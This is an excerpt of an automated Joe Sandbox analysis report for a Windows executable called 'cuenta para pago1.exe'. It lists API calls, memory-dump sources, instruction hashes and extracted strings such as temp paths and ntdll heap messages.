                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                                                                      • Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
                                                                                      • Opcode Fuzzy Hash: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                                                                      • Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401D59
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                      • CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID:
                                                                                      • API String ID: 3808545654-0
                                                                                      • Opcode ID: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                                                      • Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
                                                                                      • Opcode Fuzzy Hash: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                                                      • Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                      • CharNextW.USER32(00000000), ref: 00405A8C
                                                                                      • CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      Strings
                                                                                      • dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 00405A7A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 3213498283-4087429501
                                                                                      • Opcode ID: 9abac7bd8d8eb78344d3a0fd8b33b6e2d04e06e22655e8e5944c69e008adfdc9
                                                                                      • Instruction ID: 2b58bc667f998461ca91ac7b18547026c13bd309f09f4c7a6bbb9f4139172dd1
                                                                                      • Opcode Fuzzy Hash: 9abac7bd8d8eb78344d3a0fd8b33b6e2d04e06e22655e8e5944c69e008adfdc9
                                                                                      • Instruction Fuzzy Hash: 09F09611B10B1295DB3276544CC5A7766BCEF94361F14823BE501B72C0E3FC48818FEA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059D4
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059DE
                                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 004059F0
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-787714339
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,00402F6A,?,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00402D9D
                                                                                      • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00402DE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetWindowTextW.USER32(00000000,00428200), ref: 00403BD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: TextWindow
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$1033
                                                                                      • API String ID: 530164218-3643185989
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 0040511C
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 0040516D
                                                                                        • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,77573420,00000000,C:\Users\user\AppData\Local\Temp\,004037A6,004035BC,?), ref: 004037E8
                                                                                      • GlobalFree.KERNEL32(?), ref: 004037EF
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004037CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-787714339
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cuenta para pago1.exe,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405A20
                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cuenta para pago1.exe,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405A30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-3443045126
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
                                                                                      • CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                                      • Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
                                                                                      • Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                                      • Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:0%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:23.8%
                                                                                      Total number of Nodes:101
                                                                                      Total number of Limit Nodes:0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2 349034e0-349034ec LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b59ca3c25dfb9b92fac52c5204dad1206f57a417d88991e0383b91ff4bf41c7f
                                                                                      • Instruction ID: 4a8a1b4a264d516c9547d47282b2fc784d80b9ea045b5c8f27a9a02ed3092ebe
                                                                                      • Opcode Fuzzy Hash: b59ca3c25dfb9b92fac52c5204dad1206f57a417d88991e0383b91ff4bf41c7f
                                                                                      • Instruction Fuzzy Hash: 9490023160520802D500A1584614706201547D0245F61C896A0515528DC7ADC95675A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1 34902d10-34902d1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 3c2c7f5f7bf4c8ccfa5c7ba22a29ea060443f925052c79462e8a2a68faa65cf3
                                                                                      • Instruction ID: 4f9312b7f3fb05fbd3ffb2ac72a050283cab38c59d84522c211ed8025ddfd030
                                                                                      • Opcode Fuzzy Hash: 3c2c7f5f7bf4c8ccfa5c7ba22a29ea060443f925052c79462e8a2a68faa65cf3
                                                                                      • Instruction Fuzzy Hash: 7F90023120110813D511A1584604707101947D0285F91C897A0515518DD66EC957B121
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 34902b90-34902b9c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f44bbae12540014d38db78d91169f1e941886a27c89c59c2c1bd3786e7cbdf9e
                                                                                      • Instruction ID: 1f85344ed46f323e31d475d74201472efdd683b04b02dbc70f1bcc3c96a8b538
                                                                                      • Opcode Fuzzy Hash: f44bbae12540014d38db78d91169f1e941886a27c89c59c2c1bd3786e7cbdf9e
                                                                                      • Instruction Fuzzy Hash: F090023120118C02D510A158850474A101547D0345F55C896A4515618DC6ADC8967121
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $ $0
                                                                                      • API String ID: 3446177414-3352262554
                                                                                      • Opcode ID: 9ccd539a3ffce2d3d54c165ac0240cc63ccd36a5b1e88f6b2049dc43d58a5877
                                                                                      • Instruction ID: 3bd11132369a285f57564954d6d2e83604f67854547a9cc5b7b63fd41764d086
                                                                                      • Opcode Fuzzy Hash: 9ccd539a3ffce2d3d54c165ac0240cc63ccd36a5b1e88f6b2049dc43d58a5877
                                                                                      • Instruction Fuzzy Hash: 8232F4B56083818FE350CF68C884B5AFBE9BF88358F40492EF59A87250D779D949CF52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                      • API String ID: 3446177414-1700792311
                                                                                      • Opcode ID: 817bc5fb73dd12257735a904c9d4373e7b098f512d01a837ca9c7b0a7b3bc03e
                                                                                      • Instruction ID: b423fb7cec67a15a7ec0f4b3c6d36eeb8b5cb4171742ad17489c600afef75123
                                                                                      • Opcode Fuzzy Hash: 817bc5fb73dd12257735a904c9d4373e7b098f512d01a837ca9c7b0a7b3bc03e
                                                                                      • Instruction Fuzzy Hash: 44D10E36604685EFEB02CFA8C440AAEBFF6FF49724F058189E895AB752D735D941CB10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                      • API String ID: 3446177414-1745908468
                                                                                      • Opcode ID: fdc63642ddb2b678060878a146539bdcb9a634df428300a73239685f948fe19a
                                                                                      • Instruction ID: d9e4470eaaecebf209452125a7088d518db2909debb0c43ae29eb63ba676ac26
                                                                                      • Opcode Fuzzy Hash: fdc63642ddb2b678060878a146539bdcb9a634df428300a73239685f948fe19a
                                                                                      • Instruction Fuzzy Hash: A991FF35A04644EFEB02CFACC440A9EBBF6FF493A8F048159E452AB756CB799941CF14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 348B651C
                                                                                        • Part of subcall function 348B6565: RtlDebugPrintTimes.NTDLL ref: 348B6614
                                                                                        • Part of subcall function 348B6565: RtlDebugPrintTimes.NTDLL ref: 348B665F
                                                                                      Strings
                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3491977C
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 349197A0, 349197C9
                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 34919790
                                                                                      • apphelp.dll, xrefs: 348B6446
                                                                                      • LdrpInitShimEngine, xrefs: 34919783, 34919796, 349197BF
                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 349197B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-204845295
                                                                                      • Opcode ID: c2cbf4e52c3e8ffd54acf2a065f92fbd3220f1d6f54f0d6ca0c9145532be7baf
                                                                                      • Instruction ID: 34f367c44a5ae3d63d86897178e94bcecae7ec3aa0c9f63266bb6d832ab7b580
                                                                                      • Opcode Fuzzy Hash: c2cbf4e52c3e8ffd54acf2a065f92fbd3220f1d6f54f0d6ca0c9145532be7baf
                                                                                      • Instruction Fuzzy Hash: A9517C716083089FF720DF24C890A9B7BE9FF84654F404A1DF996A7660DA70D915CF93
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                      • API String ID: 0-3532704233
                                                                                      • Opcode ID: d70259bb61f6ff8098a5479688b0ca3a81ac41c84a2b0af3606d60502d45ffa7
                                                                                      • Instruction ID: dd1fadd5fd88c194f21e8a50212fe9c170973d026aefdc81762e19694851766c
                                                                                      • Opcode Fuzzy Hash: d70259bb61f6ff8098a5479688b0ca3a81ac41c84a2b0af3606d60502d45ffa7
                                                                                      • Instruction Fuzzy Hash: 06B15DB6508355EFDB11CF18C440A5FB7E8AB88798F418A2EF899D7341DB70DD488B92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 348ED879
                                                                                        • Part of subcall function 348C4779: RtlDebugPrintTimes.NTDLL ref: 348C4817
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1975516107
                                                                                      • Opcode ID: 616947b3c1bda64b035c889e181459da147df9df6aaaab0c6a16614b3d0f27f3
                                                                                      • Instruction ID: 58e0a49db57ae897f0012794ed30ce4757b3121ff46764290cbe9991be95ebfd
                                                                                      • Opcode Fuzzy Hash: 616947b3c1bda64b035c889e181459da147df9df6aaaab0c6a16614b3d0f27f3
                                                                                      • Instruction Fuzzy Hash: 8551E275A0834ADFFB14CFA4C8447ADBBF1FF46318F504259D9106B281D7B0A98ACB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 348BD202
                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 348BD136
                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 348BD0E6
                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 348BD06F
                                                                                      • @, xrefs: 348BD24F
                                                                                      • @, xrefs: 348BD09D
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 348BD263
                                                                                      • @, xrefs: 348BD2B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                      • API String ID: 0-1356375266
                                                                                      • Opcode ID: 59e16336311f989707b88ac54de1d36f32287f577db0dbdf76c720328b23046a
                                                                                      • Instruction ID: 2ee0bd5eef968b3ebd59a84fbe15039a7e8500b1fef1e714e65833856dca19d4
                                                                                      • Opcode Fuzzy Hash: 59e16336311f989707b88ac54de1d36f32287f577db0dbdf76c720328b23046a
                                                                                      • Instruction Fuzzy Hash: 89A12CB1508349EFE721CF14C440B9FB7E8AB84769F408A2EF59996341DB74D908CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                      • API String ID: 0-2224505338
                                                                                      • Opcode ID: 127589ad314f014d7f64b71bbc9b1d74c6d941042de46d486ed76793eea448dc
                                                                                      • Instruction ID: 25578a5015a280480bd28af5bb261926886ade9804e3a4c1c2938b0e071be414
                                                                                      • Opcode Fuzzy Hash: 127589ad314f014d7f64b71bbc9b1d74c6d941042de46d486ed76793eea448dc
                                                                                      • Instruction Fuzzy Hash: C5514B37202648EFEB16CF9CC884E5A77E9EF08678F108599F4029BB16DA79DD40CE14
